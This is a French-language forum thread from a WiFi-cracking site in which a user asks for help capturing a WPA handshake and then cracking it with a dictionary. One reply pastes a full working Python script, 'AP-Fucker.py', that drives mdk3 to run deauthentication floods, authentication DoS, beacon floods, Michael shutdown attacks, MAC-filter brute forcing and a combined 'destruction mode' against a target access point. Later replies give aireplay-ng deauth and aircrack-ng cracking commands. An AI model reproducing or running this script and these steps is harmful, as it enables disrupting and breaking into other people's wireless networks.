Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 15-02-2010 16:42:26

blaxh404
Membre Actif
Inscription : 05-01-2010
Messages : 26

capture du handshake

bonjour
j'essaie de capturer le handshake de mon routeur et je reste bloqué la sur le tuto
le handshake arrive jamais

faut il arrêter le shell N°1?
y'a il des technique pour obtenir le handshake facilement?

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 15-02-2010 19:17:02

Veidam
Membre Indispensable
Lieu : us
Inscription : 11-02-2010
Messages : 530

Re : capture du handshake

salut pour bt4F tu peut copier ce programme codé par MatToufoutu user de bt-fr.net un grand merci a lui !!!

il va remplacer aireplay-ng -0 c bien mieux

nommé le fichier AP-Fucker.py (enfin en .py) il marche sous bt4 en utilisant MDK3 tu peut faire une mise a jour de MDK3 en passant a la version 6

wget http://homepages.tu-darmstadt.de/~p_lar … v6.tar.bz2
( installation: tar jxvf mdk3-v6.tar.bz2 && cd mdk3-v6 && make && sudo make install && rm -rf mdk3-v6* )

#!/usr/bin/env python
# -*- coding: Utf-8 -*-
#
# WIRELESS ACCESS POINT FUCKER
# Interactive, Multifunction, Destruction Mode Included
# Name: AP-Fucker.py
# Version: 0.5
# Coded by: MatToufoutu
#
# Thanks to BackTrack crew, especially ShamanVirtuel and ASPJ
#
# USAGE: Launch the script as root using "python AP-Fucker.py", follow instructions, enjoy!
# Prerequisites: Have mdk3 installed
#

### IMPORTS
import commands, os
from sys import stdout, exit
from threading import Thread
from time import sleep, ctime
try:
    import psyco
    psyco.profile()
except ImportError:
    pass

global runanim; runanim = True

### MDK3 THREADED ATTACKS CLASS
class mdk3(Thread):
	def __init__(self, attack, attack_options):
		Thread.__init__(self)
		self.attack = attack
		self.iface = attack_options[0]
		self.essid = attack_options[1]
		self.bssid = attack_options[2]
		self.chan = attack_options[3]
		self.log = "apfucker.log"
	def bflood(self):
		out = open(self.log,"a")
		out.write("\n ----- "+ctime()+" : Launching beacon flood against %s on channel %s -----" % (self.essid, self.chan))
		out.close()
		print("\n Launching beacon flood against %s on channel %s" % (self.essid, self.chan))
		sleep(2)
		os.system("mdk3 "+self.iface+" b -n "+self.essid+" -g -w -m -c "+self.chan+" >> "+self.log)
	def ados(self):
		out = open(self.log,"a")
		out.write("\n ----- "+ctime()+" : Launching Auth DoS against %s -----" % (self.bssid))
		out.close()
		print("\n Launching Auth DoS against %s " % (self.bssid))
		sleep(2)
		os.system("mdk3 "+self.iface+" a -i "+self.bssid+" -m -s 1024 >> "+self.log)
	def amok(self):
		out = open(self.log,"a")
		out.write("\n ----- "+ctime()+" : Launching Deauth Flood 'Amok' Mode on channel %s -----" % (self.chan))
		out.close()
		print("\n Launching Deauth Flood 'Amok' Mode on channel %s" % (self.chan))
		sleep(2)
		os.system("mdk3 "+self.iface+" d -c "+self.chan+" -s 1024 >> "+self.log)
	def mich(self):
		out = open(self.log,"a")
		out.write("\n ----- "+ctime()+" : Launching Michael 'Shutdown' Exploitation against %s on channel %s -----" % (self.bssid, self.chan))
		out.close()
		print("\n Launching Michael 'Shutdown' Exploitation against %s on channel %s" % (self.bssid, self.chan))
		sleep(2)
		os.system("mdk3 "+self.iface+" m -t "+self.bssid+" -j -w 1 -n 1024 -s 1024 >> "+self.log)
	def wids(self):
		out = open(self.log,"a")
		out.write("\n ----- "+ctime()+" : Launching WIDS Confusion against %s on channel %s -----" % (self.essid, self.chan))
		out.close()
		print("\n Launching WIDS Confusion against %s on channel %s" % (self.essid, self.chan))
		sleep(2)
		os.system("mdk3 "+self.iface+" w -e "+self.essid+" -c "+self.chan+" >> "+self.log)
	def brutmac(self):
		global runanim
		out = open(self.log, "a")
		out.write("\n ----- "+ctime()+" : Launching MAC filter Brute-Forcer against %s -----\n" % (self.bssid))
		print("\n Launching MAC filter Brute-Forcer against %s" % (self.bssid))
		sleep(2)
		macfound = commands.getoutput("mdk3 "+self.iface+" f -t "+self.bssid).splitlines()[-2:]
		runanim = False
		sleep(1)
		print; print
		for line in macfound:
			print(line)
			out.write("\n"+line)
		out.close()
		print
		exit(0)
	def run(self):
		if self.attack == "B":
			self.bflood()
		if self.attack == "A":
			self.ados()
		if self.attack == "D":
			self.amok()
		if self.attack == "M":
			self.mich()
		if self.attack == "W":
			self.wids()
		if self.attack == "C":
			self.brutmac()

### AUXILIARY FUNCTIONS
## CHECK IF IFACE IS IN MONITOR MODE
def check_mon(iface):
	for line in commands.getoutput("iwconfig "+iface).splitlines():
		if "Mode:Monitor" in line:
			return True
	return False

## CHECK IF BSSID IS VALID
def check_mac(ap):
	if len(ap) != 17 or ap.count(':') != 5:
		return False
	macchar="0123456789abcdef:"
	for c in ap.lower():
		if macchar.find(c) == -1:
			return False
	return True

## CHECK IF CHANNEL IS VALID
def check_chan(iface, chan):
    if chan.isdigit():
        channel=int(chan)
        if not channel in range(1, int(commands.getoutput("iwlist "+iface+" channel | grep channels | awk '{print $2}'"))+1):
            return False
    else:
        return False
    return True

## CLEAN EXIT
def clean_exit():
    print;print
    print("\nAction aborted by user. Exiting now")
    for pid in commands.getoutput("ps aux | grep mdk3 | grep -v grep | awk '{print $2}'").splitlines():
    	os.system("kill -9 "+pid)
    print("Hope you enjoyed it ;-)")
    sleep(3)
    os.system("clear")
    exit(0)

## DUMMY WAITING MESSAGE (ANIMATED)
def waiter(mess):
	try:
		stdout.write("\r | "+mess)
		stdout.flush()
		sleep(0.15)
		stdout.write("\r / "+mess)
		stdout.flush()
		sleep(0.15)
		stdout.write("\r-- "+mess)
		stdout.flush()
		sleep(0.15)
		stdout.write("\r \\ "+mess)
		stdout.flush()
		sleep(0.15)
		stdout.write("\r | "+mess)
		stdout.flush()
		sleep(0.15)
		stdout.write("\r / "+mess)
		stdout.flush()
		sleep(0.15)
		stdout.write("\r-- "+mess)
		stdout.flush()
		sleep(0.15)
		stdout.write("\r \\ "+mess)
		stdout.flush()
		sleep(0.15)
	except KeyboardInterrupt:
		clean_exit()

### MAIN APP
attackAvail = ["B", "A", "W", "D", "M", "T", "E", "C"]
attack_opt=[]

if commands.getoutput("whoami") != "root":
    print("This script must be run as root !")
    exit(0)
try:
	os.system("clear")
	print("\n\t\t########## ACCESS POINT FUCKER ##########\n")
	print("Choose your Mode:\n\t - (B)eacon flood\n\t - (A)uth DoS\n\t - (W)ids confusion\n\t - (D)isassociation 'AmoK Mode'\n\t - (M)ichael shutdown exploitation\n\t - MA(C) Filter Brute-Forcer\n\t - Des(T)ruction mode (USE WITH CAUTION)\n")
	
	## GET MODE
	while 1:
		mode = raw_input("\n>>> ")
		if mode.upper() not in attackAvail:
			print("  '%s' is not a valid mode !" % mode)
		else:
			break

	## GET INTERFACE
	while 1:
		iface = raw_input("\nMonitor interface to use: ")
		if check_mon(iface):
			attack_opt.append(iface)
			break
		else:
			print("%s is not a Monitor interface, try again or hit Ctrl+C to quit" % iface)

	## GET ESSID
	if mode.upper() == "B" or mode.upper() == "W" or mode.upper() == "T":
		attack_opt.append("\""+raw_input("\nTarget ESSID: ")+"\"")
	else:
		attack_opt.append(None)

	## GET BSSID
	if mode.upper() == "A" or mode.upper() == "M" or mode.upper() == "T" or mode.upper() == "C":
		while 1:
			bssid = raw_input("\nTarget BSSID: ")
			if check_mac(bssid):
				attack_opt.append(bssid)
				break
			else:
				print("Invalid BSSID, try again or hit Ctrl+C to quit")
	else:
		attack_opt.append(None) 

	## GET CHANNEL
	if mode.upper() != "C":
		while 1:
			channel = raw_input("\nTarget channel: ")
			if check_chan(iface, channel):
				attack_opt.append(channel)
				break
			else:
				print("Channel can only be 1 to 14, try again or hit Ctrl+C to quit")
	else:
		attack_opt.append(None)

	## LAUNCH SELECTED ATTACK
	if os.path.exists("apfucker.log"):
		os.unlink("apfucker.log")
	if mode.upper() != "T":
		os.system('clear')
		mdk3(mode.upper(), attack_opt).start()
		sleep(1)
		print; print; print
		while runanim:
			waiter("   ATTACK IS RUNNING !!! HIT CTRL+C TWICE TO STOP THE TASK...")
	else:
		os.system('clear')
		print("\n\t/!\\/!\\/!\\ WARNING /!\\/!\\/!\\\n")
		print(" You've choosen DESTRUCTION MODE")
		print(" Using this mode may harm your WiFi card, use it at your own risks.")
		validate = raw_input(" Do you wish to continue? (y/N): ")
		if validate.upper() != "Y":
			print(" Ok, exiting now")
			exit(0)
		else:
			out=open("apfucker.log","a")
			out.write("\n ----- "+ctime()+" : Launching Destruction Combo. Target is AP %s|%s on channel %s -----" % (attack_opt[1], attack_opt[2], attack_opt[3]))
			out.close()
			print("\n Launching Destruction Combo\n Target is AP %s|%s on channel %s" % (attack_opt[1], attack_opt[2], attack_opt[3]))
			print(" Please be kind with your neighbours xD")
			mdk3("B", attack_opt).start()
			mdk3("A", attack_opt).start()
			mdk3("D", attack_opt).start()
			mdk3("M", attack_opt).start()
			##wids may raise a segfault(internal mdk3 problem when multiple attacks apparently)
			#mdk3("W",attack_opt).start()
			sleep(1)
			print; print; print
			while runanim:
				waiter("   DESTRUCTION COMBO IS RUNNING !!! HIT CTRL+C TWICE TO STOP THE TASK...")
except KeyboardInterrupt:
    clean_exit()

mais si tu est sur bt3F tu utiliser aussi sharon (de shamanvirtuel remote_exploit) je n'utilise que celui-ci mais choper un handshake pour de la brute force reste une héresie mais bon il faut essayer c amusant...

cordialement

Dernière modification par Veidam (15-02-2010 19:19:17)

Hors Ligne

#3 15-02-2010 20:21:05

blaxh404
Membre Actif
Inscription : 05-01-2010
Messages : 26

Re : capture du handshake

merci beaucoup je vais essayer ça

d'autre part quand j'ai voulu transférer le dictionnaire de wpa sur le pc il dit qu'il y a plus de place...
effectivement il reste 500mo

j'utilise un live cd
est-ce normal d'avoir un espace si petit?

Hors Ligne

#4 15-02-2010 20:43:26

Veidam
Membre Indispensable
Lieu : us
Inscription : 11-02-2010
Messages : 530

Re : capture du handshake

je parie que tu débute smile bien fait cette exercice tu vas comprendre

cd ../mnt
dir
cd sda OU hda

ou bien

cd Desktop
dir

tu dois mettre le chemin de ton dico dans aircrack suis les tutos de m1ck3y qui en parle je pense ...

sinon un bon lien pour apprendre Linux

essaie de plus lire les tutos STP

a++

Hors Ligne

#5 15-02-2010 21:01:16

blaxh404
Membre Actif
Inscription : 05-01-2010
Messages : 26

Re : capture du handshake

dans backtrack je debute oui
j'ai linux sur mon pc par contre

je dois vous avouer que j'ai rien compris la ^^'
si on peut m'expliquer plus clairement ce serait super sympa
merci d'avance big_smile

Hors Ligne

#6 15-02-2010 21:44:44

Grand Hibou
Membre d'honneur
Inscription : 08-06-2008
Messages : 1 280

Re : capture du handshake

ce sont des exemples de commandes à taper dans un terminal virtuel (un shell si tu préfères) de ton nunux.


Un virus est un programme nocif.
Il est petit, rapide, prend peu de place en mémoire et sait se faire discret.

Windows n'est donc pas un virus, c'est un bug!

Hors Ligne

#7 16-02-2010 16:23:42

blaxh404
Membre Actif
Inscription : 05-01-2010
Messages : 26

Re : capture du handshake

ce qu'a dit veidam j'ai essaier mais quand je tape cd sda ou hda ça marche pas
il me dit bash command not found et cd desktop aussi

Hors Ligne

#8 17-02-2010 15:22:52

blaxh404
Membre Actif
Inscription : 05-01-2010
Messages : 26

Re : capture du handshake

que faire?

Hors Ligne

#9 17-02-2010 17:41:05

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : capture du handshake

blaxh404 a écrit :

que faire?

Commencer par apprendre des bases de linux, en particulier le terminal smile Si tu as tapé explicitement "cd sda ou hda", c'est que tu n'as pas compris le but de la manœuvre. Donc tu devrais commencer par une page comme celle-ci --> Console [doc.ubuntu-fr.org]

Sinon, dans l'ordre :
- tu devrais mettre un lien vers le tuto dont tu parles. Rien que sur ce site, il y en a déjà plusieurs, donc pour comprendre de quoi tu parles il faut qu'on voie ce que tu essaies de faire smile
- précise le matériel que tu utilises (modèle de carte WiFi), ainsi que ta version de BackTrack, histoire qu'on puisse adapter nos réponses
- pour obtenir un handshake facilement, ou bien tu attends qu'un client se connecte au réseau, ou bien tu le forces à se reconnecter (en lui envoyant une trame de déauthentification). Pour ca, tu peux utiliser AP-fucker comme Veidam te l'a suggéré, mais je trouve que cet outil n'est pas du tout adapté ici. Moi je ferais plutôt ca avec aireplay-ng, avec une commande du genre [c]aireplay-ng -0 5 -c <mac_station> -a <mac_routeur> mon0[/c]
Pour plus d'infos --> deauthentication [aircrack-ng.org]
- Si tu es en mode Live (CD ou USB), tout ton système tourne en mémoire vive (RAM), donc c'est un peu normal qu'il n'aie pas la place de stocker un dictionnaire de 500 Mo smile Par contre, tu peux le mettre sur une clé USB et y accéder directement depuis Konqueror. Les commandes que Veidam t'a données, c'est pour accéder à la clé depuis la console, mais on va faire simple au début...

Voilà, sans avoir plus d'info, je ne sais pas t'en dire plus, mais tu devrais pouvoir t'en sortir wink
Bonne chance !

@Veidam : l'outil de ShamanVirtuel, c'est Charon, pas Sharon wink

Hors Ligne

#10 17-02-2010 17:50:41

blaxh404
Membre Actif
Inscription : 05-01-2010
Messages : 26

Re : capture du handshake

Ok merci pour ces conseil
alors finalement j'ai obtenu le handshake c'est bon
j'utilise backtrack 4
le lien pour le tuto >>http://www.crack-wifi.com/tutoriel-crack-wpa.php
non non j'ai pas taper ça x) je suis pas con a se point la merci tongue

le probleme est que dans le tuto il faut copier le fichier dictionnaire dans le dossier root ou il y a deja les fichier du handshake
mais il n'y a plus de place comme tu as dit tout est stocké sur la ram
comment faut faire pour dire a backtrack d'aller chercher (''booter'' les fichier qui sont dans root sur la clé usb?)

Hors Ligne

#11 17-02-2010 18:00:38

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : capture du handshake

blaxh404 a écrit :

je suis pas con a se point la merci tongue

Ce n'est pas une question d'être con ou pas, juste que je ne connais absolument pas ton niveau, et que pour quelqu'un qui n'a jamais vu une console de sa vie (et qui n'a pas l'air de savoir ce qu'est une commande, cfr #5), c'était plausible. Toutes mes excuses si tu t'es senti insulté wink

blaxh404 a écrit :

comment faut faire pour dire a backtrack d'aller chercher (''booter'' les fichier qui sont dans root sur la clé usb?)

Aïe, mes yeux ! Faut quand même faire un minimum gaffe aux termes que tu utilises, là, "booter" ca n'a rien à voir avec ce que tu dis yikes
Bref, si tu veux utiliser un dictionnaire qui se trouve dans un autre emplacement, il suffit de le préciser à Aircrack. Je m'explique :
Supposons que tu as ton fichier dictionnaire sur une clé USB, branchée à ton PC. Tu ouvres Konqueror (le navigateur de fichiers, dans la barre du bas près du menu), puis tu cliques sur "storage media" (ou bien tu tapes [c]media:/[/c] dans la barre d'adresse). Là, tu as accès à tous tes disques, et normalement ta clé USB en fait partie. Tu l'ouvres, tu vois ton fichier dictionnaire, Youpie tout va bien ! Tu notes (ou copies) l'adresse qui se trouve dans la barre en haut (sans doute [c]media:/sdb1[/c])
Là, tu vas dans ta console, et pour Aicrack, quand tu utilises l'option [c]-w[/c] pour spécifier où se trouve le dictionnaire, tu écris [c]media://sdb1/dico.txt[/c] au lieu de [c]dico.txt[/c], par exemple. Le but, c'est de donner le chemin complet vers le fichier, même s'il se trouve ailleurs.

Voilà, j'espère que ca ira pour toi. Si ce n'est pas le cas, il y a moyen de le faire en console, donne moi juste le nom du périphérique (le sd* qui apparaît dans la barre d'adresse), et le nom de ton fichier dictionnaire, je te donnerai les commandes smile

Hors Ligne

#12 17-02-2010 18:03:12

blaxh404
Membre Actif
Inscription : 05-01-2010
Messages : 26

Re : capture du handshake

non je me suis pas senti insutlé tout va bien

merci c'est parfaitement ca qu'il me fallait wink
j'ai compris la combine je teste dès que possible

*oui je sais que booter a rien a voir mais il fallais que je trouve un mot tongue

Dernière modification par blaxh404 (17-02-2010 18:16:42)

Hors Ligne

#13 20-02-2010 20:28:30

blaxh404
Membre Actif
Inscription : 05-01-2010
Messages : 26

Re : capture du handshake

j'ai essayer, j'ai taper cette ligne

aircrack-ng -w /media/sdb1/wpalist.txt out-01.cap

aircrack me dit qu'il n'y a pas de fichier dictionnaire spécifier

Hors Ligne

#14 20-02-2010 20:34:24

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : capture du handshake

Alors c'est que tu as mal tapé le nom du dico, ou que ton disque dur n'est pas monté sur /media/sdb1... On va procéder autrement :
- tu ouvres Konqueror, et tu copies-colles ton fichier de capture (le .cap) dans le même dossier que le dictionnaire (sur le disque dur, donc)
- quand tu as tes 2 fichiers dans le même dossier, tu appuies sur la touche F4, pour ouvrir une console qui se positionne déjà dans le bon dossier
- et enfin tu tapes ta commande : [c]aircrack-ng -w wpalist.txt out-01.cap[/c] (comme tous tes fichiers sont dans le dossier courant, tu n'as pas besoin de préciser les chemins) wink

En espérant que ca marche comme ca ! smile

Hors Ligne

#15 20-02-2010 20:35:43

blaxh404
Membre Actif
Inscription : 05-01-2010
Messages : 26

Re : capture du handshake

oui mais le probleme est que j'utilise un live CD
tout est stocké sur la ram
mon dico pese 700mo et j'ai 500mo de ram dispo

Hors Ligne

#16 20-02-2010 20:40:30

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : capture du handshake

Oui, et alors ? Relis bien ce que j'ai dit : tu gardes ton dictionnaire sur un disque dur externe, et tu copies ton fichier de capture (quelques Ko) au même endroit, donc aussi sur le disque dur externe. Et quand tout le monde est rassemblé (sur le disque... enfin, t'as compris quoi) tu tapes F4 pour ouvrir une console qui se trouve déjà "sur ton disque dur" (si je peux m'exprimer ainsi). Aucun problème de stockage wink

Hors Ligne

#17 20-02-2010 21:13:48

blaxh404
Membre Actif
Inscription : 05-01-2010
Messages : 26

Re : capture du handshake

merci ca marche

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
8 871 22-10-2016 19:11:07 par Nawus
4 464 15-06-2016 10:04:39 par s1lv3rf0x
18 5337 31-05-2016 23:50:18 par Fab955
12 632 02-05-2016 18:18:15 par FredHilbert
6 606 10-02-2016 19:27:15 par bmwx3000

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.028 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]